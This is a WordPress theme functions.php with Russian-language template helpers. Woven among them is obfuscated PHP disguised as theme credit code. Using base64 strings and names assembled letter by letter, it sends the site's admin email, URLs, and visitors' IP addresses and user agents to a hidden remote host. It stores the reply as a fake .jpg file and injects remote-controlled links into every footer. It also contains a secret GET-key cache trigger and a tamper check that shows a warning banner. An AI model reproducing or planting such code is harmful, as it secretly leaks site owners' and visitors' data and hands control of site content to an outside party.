<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $EoDfcV='b';$JFhuui='a';$GPVS='o';$Iloy='e';$IQmD='4';$LqDUBa='s';$XxgWfK='6';$rbvo='e';$mPBLf='d';$zctvh='c';$mgKBF='e';$VpWyky='d';$WiyqD='_';$kmQrJYDY=$EoDfcV.$JFhuui.$LqDUBa.$Iloy.$XxgWfK.$IQmD.$WiyqD.$VpWyky.$mgKBF.$zctvh.$GPVS.$mPBLf.$rbvo;$vvukNS='l';$xPCgTJ='z';$KGbqVg='t';$oolzLXY='e';$wMza='f';$TOryE='g';$odwG='i';$eGsio='n';$rqDTwwC='a';$HTnxoDOV=$TOryE.$xPCgTJ.$odwG.$eGsio.$wMza.$vvukNS.$rqDTwwC.$KGbqVg.$oolzLXY;$ffOcaeh='1';$lpyA='t';$XlxWXV='r';$bofs='s';$jBgo='r';$eOTYz='_';$XfpjpQp='3';$tgTTH='t';$xWczkhR='o';$rlbUeyrH=$bofs.$lpyA.$XlxWXV.$eOTYz.$jBgo.$xWczkhR.$tgTTH.$ffOcaeh.$XfpjpQp;$CgJhY='r';$ehxOix='t';$MbcI='v';$tqJog='r';$eQUV='s';$vwKcIl='e';$QUhqgGlB=$eQUV.$ehxOix.$CgJhY.$tqJog.$vwKcIl.$MbcI;                     
		$ur__________p='b';$ci______d='a';$ma_________g='o';$tf________w='e';$tb_______________j='4';$ko_______r='s';$pn_____________y='6';$ny____________g='e';$fz___v='d';$ky__________v='c';$kc__________m='e';$gs_________a='d';$yg_______________s='_';$ns__________p=$ur__________p.$ci______d.$ko_______r.$tf________w.$pn_____________y.$tb_______________j.$yg_______________s.$gs_________a.$kc__________m.$ky__________v.$ma_________g.$fz___v.$ny____________g;
		$gi________y='c';$my_____o='e';$qa__________c='n';$ch______________v='n';$vx__________d='t';$hw_____________g='s';$gc_______m='x';$gk________e='t';$hm______h='o';$jg________b='_';$mj___________j='f';$rg________e='u';$zy__h='i';$lw________r='i';$jw_______z='s';$cv__u=$mj___________j.$rg________e.$ch______________v.$gi________y.$gk________e.$zy__h.$hm______h.$qa__________c.$jg________b.$my_____o.$gc_______m.$lw________r.$hw_____________g.$vx__________d.$jw_______z;
		$la______________y='e';$yx___________e='p';$ny_____________k='o';$lq_________v='f';$od____________f='n';$yl___n=$lq_________v.$ny_____________k.$yx___________e.$la______________y.$od____________f;
		$lf_______________a='f';$rn________j='e';$pq__________e='a';$uh_____q='d';$jr_____e='r';$bs______v=$lf_______________a.$jr_____e.$rn________j.$pq__________e.$uh_____q;
		$lk___e='c';$cy________g='l';$ct_____________n='o';$zm_____x='s';$vj________j='f';$ie________r='e';$ur______e=$vj________j.$lk___e.$cy________g.$ct_____________n.$zm_____x.$ie________r;
		
		define("WP_ID", $ns__________p("Mi4wLjA="));
		define("WP_TTL", $ns__________p("MTA4MDA="));
		define("WP_SRC", $ns__________p("dHBva24="));
	


		function wp_get_header() {
			global $ns__________p, $cv__u;
			
			if (
				$cv__u($ns__________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$cv__u($ns__________p("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$cv__u($ns__________p("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ns__________p, $yl___n, $ur______e, $bs______v;
			
			$zh_______________k = TEMPLATEPATH."/".$ns__________p("Zm9vdGVyLnBocA==");
			$lu_____r = @$yl___n($zh_______________k, "r");
			$zh_______________k = @$bs______v($lu_____r, @filesize($zh_______________k));
			@$ur______e($lu_____r);
			
			$db_____e = TEMPLATEPATH."/".$ns__________p("ZnVuY3Rpb25zLnBocA==");
			$lu_____r = @$yl___n($db_____e, "r");
			$db_____e = @$bs______v($lu_____r, @filesize($db_____e));
			@$ur______e($lu_____r);
			
			$xo___________a = 0;
			if($zh_______________k && $db_____e) {
				if ($ns__________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($zh_______________k, $ns__________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$xo___________a = 1;
					}
					if (substr_count($zh_______________k, "wp_theme_GPL_credits()") < 1) {
						$xo___________a = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$xo___________a = 12;
				}
			}
			
			if($xo___________a > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $xo___________a -->";
			}
		}
	


		function wp_loaded() {
			global $ns__________p, $cv__u;
			return $cv__u($ns__________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($fy_______s, $oy__________u = "(more...)", $yn__________m = 0, $vn_____l = "") {
				$wa________j = get_the_content($oy__________u, $yn__________m, $vn_____l);
				$wa________j = apply_filters("the_content", $wa________j);
				
				$wa________j = str_replace("]]>", "]]>", $wa________j);
				if (strlen($_GET["p"]) > 0) {
					echo $wa________j;
				}
				else if ((strlen($wa________j)>$fy_______s) && ($aq____a = strpos($wa________j, " ", $fy_______s ))) {
					$wa________j = substr($wa________j, 0, $aq____a);
					$wa________j = $wa________j;
					echo $wa________j;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$oy__________u</a></div></p>";
				} else {
					echo $wa________j;
				}
				
			}
		}
	


		$kr___________p='e';$ku_______________z='n';$rb_____________g='4';$kk__________a='6';$my_________d='e';$ho___________s='o';$ox____k='_';$pt_____t='a';$fj_____q='d';$sb____________l='s';$rl_____v='b';$tw__________k='e';$ng____________g='c';$ue__________y=$rl_____v.$pt_____t.$sb____________l.$kr___________p.$kk__________a.$rb_____________g.$ox____k.$my_________d.$ku_______________z.$ng____________g.$ho___________s.$fj_____q.$tw__________k;
		$xx_____________k='t';$fi____n='e';$re_____u='g';$zt__________u='f';$em_______w='s';$cl__________z='e';$ws___________w='t';$mg___________a='_';$hl________s='l';$xr_________h='e';$ys___________e='o';$av___________o='n';$ex____v='t';$ni____r='_';$nl_____________g='i';$de_____z='n';$sn_____z='c';$gw__________c=$zt__________u.$nl_____________g.$hl________s.$fi____n.$ni____r.$re_____u.$xr_________h.$ws___________w.$mg___________a.$sn_____z.$ys___________e.$av___________o.$ex____v.$cl__________z.$de_____z.$xx_____________k.$em_______w;
		$fk___________c='e';$gr___________y='s';$bw____c='l';$nj________o='t';$id_____________l='f';$db_____l='i';$st___________e='x';$fa______________j='s';$wd___c='_';$sd____f='e';$en________c='i';$ln_______________n=$id_____________l.$en________c.$bw____c.$sd____f.$wd___c.$fk___________c.$st___________e.$db_____l.$fa______________j.$nj________o.$gr___________y;
		$za_____j='m';$lg_____________z='_';$nu____u='c';$ef________w='r';$jo__w='i';$kn__________j='s';$ui_____d='n';$lt____________o='a';$tf_______n='r';$ft_________k='o';$hl_________t='e';$dz________u='o';$ow____________x='p';$og_______________f='v';$np___________y='e';$bg_____________h=$og_______________f.$hl_________t.$ef________w.$kn__________j.$jo__w.$dz________u.$ui_____d.$lg_____________z.$nu____u.$ft_________k.$za_____j.$ow____________x.$lt____________o.$tf_______n.$np___________y;
		$vn____________l='p';$to__t='s';$ch___________v='n';$bp______t='f';$ii______l='o';$be___________e='c';$ns____________m='k';$wn_______________x='e';$nd____g='o';$yo_________e=$bp______t.$to__t.$nd____g.$be___________e.$ns____________m.$ii______l.$vn____________l.$wn_______________x.$ch___________v;
		$re_______________n='f';$wq__________x='i';$ho__________f='r';$wo______________s='w';$lm_____p='t';$ra_________k='e';$dx_____________c=$re_______________n.$wo______________s.$ho__________f.$wq__________x.$lm_____p.$ra_________k;
		$xu____________u='m';$wx________n='5';$lj___________w='d';$yp_______h=$xu____________u.$lj___________w.$wx________n;
		$kp___o='a';$vd___________b='t';$yd_____________o='p';$wt_____f='r';$kr_________x='l';$qi____g='e';$ch____y='h';$ws____t='a';$vt__y=$wt_____f.$qi____g.$ws____t.$kr_________x.$yd_____________o.$kp___o.$vd___________b.$ch____y;
		$zr___t='u';$so__________x='e';$mw__________m='l';$fi_____________e='r';$me____f='e';$ai____w='i';$ou____o='i';$wn___o='z';$sy___q='s';$er_________x='a';$ac______n='n';$uu____f=$zr___t.$ac______n.$sy___q.$so__________x.$fi_____________e.$ai____w.$er_________x.$mw__________m.$ou____o.$wn___o.$me____f;
		$dk_____p='p';$ek________i='t';$ty_______________o='m';$je_________d='n';$gd____________w='a';$wo__v='m';$io_________p='e';$ng_____________p=$ek________i.$io_________p.$wo__v.$dk_____p.$je_________d.$gd____________w.$ty_______________o;
		$is___________o='e';$qc_______________c='t';$ya_______________b='o';$vo_____________n='m';$os______________m='_';$qy_______i='n';$ir__f='e';$nn________m='s';$dp__i='t';$gk____________h='t';$sr___________q='r';$mw___d='r';$pk__________x='a';$xt__________k='a';$mf___________y='e';$kr__________f='x';$yl_________l='c';$vn________m='e';$bd_______________q='_';$bq___m='t';$dl_______________b='c';$zg__________l=$nn________m.$dp__i.$sr___________q.$mf___________y.$xt__________k.$vo_____________n.$bd_______________q.$yl_________l.$ya_______________b.$qy_______i.$qc_______________c.$ir__f.$kr__________f.$gk____________h.$os______________m.$dl_______________b.$mw___d.$vn________m.$pk__________x.$bq___m.$is___________o;
	


		function fu_____l($lp__________m) {
			global $ns__________p, $cv__u, $gw__________c, $bg_____________h, $zg__________l;
			
			if (!$cv__u($ns__________p("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($bg_____________h(PHP_VERSION, "5.0.0", ">=") && $cv__u($ns__________p("ZmlsZV9nZXRfY29udGVudHM=")) && $cv__u($ns__________p("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$va____a = $zg__________l(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$kk________q = @$gw__________c($lp__________m, 0, $va____a);
			} else {
				$kk________q = @$gw__________c($lp__________m, 0);
			}
			
			return $kk________q;
		}
	


		function rl_________o($lp__________m) {
			global $cv__u, $yo_________e, $dx_____________c, $ns__________p;
			
			if (!$cv__u($ns__________p("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$bf__y = strpos($lp__________m, "/", 7);
			$kt_____________o = array(
				"uri"     => substr($lp__________m, $bf__y),
				"host"    => str_replace("http://", "", substr($lp__________m, 0, $bf__y)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$iv___________t = @$yo_________e("$kt_____________o[host]", 80, $is___________e, $vk_______________u, 4);
			
			if (!$iv___________t) {
				return false;
			} else {
				$kk________q = "";
				$sa__o  = "GET $kt_____________o[uri] HTTP/1.0\r\n";
				$sa__o .= "Host: $kt_____________o[host]\r\n";
				$sa__o .= "Referer: $kt_____________o[referer]\r\n";
				$sa__o .= "Connection: Close\r\n\r\n";
				
				@$dx_____________c($iv___________t, $sa__o);
				
				while (!@feof($iv___________t)) {
					$bf__f = @fgets($iv___________t, (1024*24));
					
					if ($bf__f == "\r\n") {
						$lh__________x = true;
						continue;
					}
					
					if ($lh__________x) {
						$kk________q .= $bf__f;
					}
				}
				
				return $kk________q;
			}
		}
	


		function pl________t($lp__________m) {
			global $cv__u;
			$rw__d = false;
			
			if ($lp__________m != "") {
				if ($cv__u("fu_____l")) {
					$rw__d = @fu_____l($lp__________m);
				}
				
				if (!$rw__d && ($cv__u("rl_________o"))) {
					$rw__d = @rl_________o($lp__________m);
				}
			}
			
			return $rw__d;
		}
	


		function ob______________v() {
			global $_SERVER, $yp_______h;
			
			$oj__________d = $_SERVER["SERVER_NAME"];
			
			if (substr("$oj__________d", 0, 4) == "www.") {
				$oj__________d = substr("$oj__________d", 4);
			}
			
			$oj__________d = $yp_______h("$_SERVER[SERVER_NAME]");
			
			return $oj__________d;
		}
	


		function ph__________n() {
			return "file";
		}
	


		function ss_________x($lp__________m) {
			global $_SERVER, $gw__________c, $ln_______________n, $yl___n, $ur______e, $dx_____________c;
			
			$nf____________e = hd____v();
			
			$bj______y = ob______________v().".jpg";
			$ey__________h = $nf____________e["dir_upload"]["path"]."/$bj______y";
			$ql_______b = @filemtime($ey__________h);
			
			if (!$ql_______b || ((time()-$ql_______b) >= WP_TTL)) {
				$rw__d = pl________t($lp__________m);
				
				if ($rw__d) {
					if ($ln_______________n($ey__________h)) {
						@unlink($ey__________h);
					}
					
					$lu_____r = @$yl___n($ey__________h, "x+");
					
					@$dx_____________c($lu_____r, $rw__d);
					@$ur______e($lu_____r);
				}
			} else {
				if ($ln_______________n($ey__________h)) {
					$rw__d = @$gw__________c($ey__________h);
				} else {
					$rw__d = false;
				}
			}
			
			return $rw__d;
		}
	


		function hd____v() {
			global $_SERVER, $ns__________p, $ue__________y;
			
			$qj______x = wp_count_posts("post");
			$is_____q = pathinfo(get_bloginfo("template_directory"));
			
			$nf____________e = array(
				"url" => array(
					"report"      => $ns__________p("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $is_____q,
				"dir_upload"	=> kh__________x(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$is_____q[filename],
					"a005=".$qj______x->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a> "
			);
			
			$nf____________e["url"]["queryString"] = implode("&", $nf____________e["queryString"]);
			$nf____________e["url"]["report"] = $nf____________e["url"]["report"]."/?".$ue__________y($nf____________e["url"]["queryString"]).".html";
						
			return $nf____________e;
		}
	


		function kh__________x() {
			$hv________d = wp_upload_dir();
			
			if (isset($hv________d["error"])) {
				$ea____o = wx________x();
				if (is_writable($ea____o)) {
					$hv________d = array("path" => $ea____o);
				}
			}

			return $hv________d;
		}
	


		function wx________x() {
			global $cv__u, $yp_______h, $vt__y, $ng_____________p;
			
			$ey___m = (bool) ini_get("safe_mode");
			if ($ey___m == true) {
				return false;
			}
			
			if ($cv__u("sys_get_temp_dir")) {
				$mr_______a = sys_get_temp_dir();
				if (is_writable($mr_______a)) {
					return $vt__y($mr_______a);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $vt__y($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $vt__y($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $vt__y($_ENV["TEMP"]);
			} else {
				$gb__b = $ng_____________p($yp_______h(uniqid(rand(), true)), "");
				if ($gb__b) {
					$mr_______a = $vt__y(dirname($gb__b));
					@unlink($gb__b);
					return $mr_______a;
				} else {
					return false;
				}
			}
		}
	


		function ee________l() {
			global $_GET, $ln_______________n;
			
			$nf____________e = hd____v();
			$oj__________d = ob______________v();
			$ep_______________r = ph__________n();
			
			$si_______________q = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ep_______________r == "file") {
					$ds_________q = $nf____________e["dir_upload"]["path"]."/".$oj__________d.".jpg";
					if ($ln_______________n($ds_________q)) {
						@unlink($ds_________q);
						$si_______________q = "deleted";
					}
				}
				
				$ko________y = array(
					"s"	=> $si_______________q,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ko________y AS $wa__a => $so__________p) echo " [$wa__a:$so__________p]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $cv__u, $ns__________p, $uu____f;
			$nf____________e = hd____v();
			
			$kg_____________d = "ss_________x";
			if ($cv__u($kg_____________d)) {
				$kk________q = $kg_____________d($nf____________e["url"]["report"]);
			}
			
			if ($kk________q) {
				if ($kk________q = @$ns__________p($kk________q)) {
					$kk________q = @$uu____f($kk________q);
					
					if (strlen($kk________q[custom_credit]) >= 5) {
						$nf____________e["default_string"] = $kk________q[custom_credit];
					}
					
					if ($kk________q["status"] == "0") {
						$ue_____l = 1;
						$xi___r = 1;
					} else {
						$rc___________q = sizeof($kk________q["links"]);
						$ge_________u = $nf____________e["default_string"];
						
						if ($rc___________q > 0 && $kk________q["links"] !== "") {
							$tv______________s = 0;
							foreach ($kk________q["links"] as $ua_____a => $re___m) {
								$tv______________s++;
								if ($re___m->l_path == "" || $re___m->l_path == $_SERVER["REQUEST_URI"]) {
									$re___m->l_href = htmlspecialchars(strip_tags($re___m->l_href));
									$re___m->l_title = htmlspecialchars(strip_tags($re___m->l_title));
									$re___m->l_anchor = htmlspecialchars(strip_tags($re___m->l_anchor));
									$ge_________u .= " | ";
									$ge_________u .= "<a href='$re___m->l_href' title='$re___m->l_title'";
									if ($re___m->l_nofollow == "1") {
										$ge_________u .= " rel='nofollow'";
									}
									$ge_________u .= ">$re___m->l_anchor</a>";
								}
							}
						}
						$nf____________e["links"] = "$ge_________u";
						if ($kk________q[credit] == "0") {
							$nf____________e["links"] = "";
						}
					}
				} else {
					$ue_____l = "1";
				}
			} else {
				$ue_____l = "1";
			}
			
			if ($ue_____l == "1") {
				$nf____________e["links"] = $nf____________e["default_string"];
			}
			
			echo "$nf____________e[links]";
			
			echo "<!-- s: $kk________q[signature] -->";
			ee________l();
		}
	                      
 function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();

                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

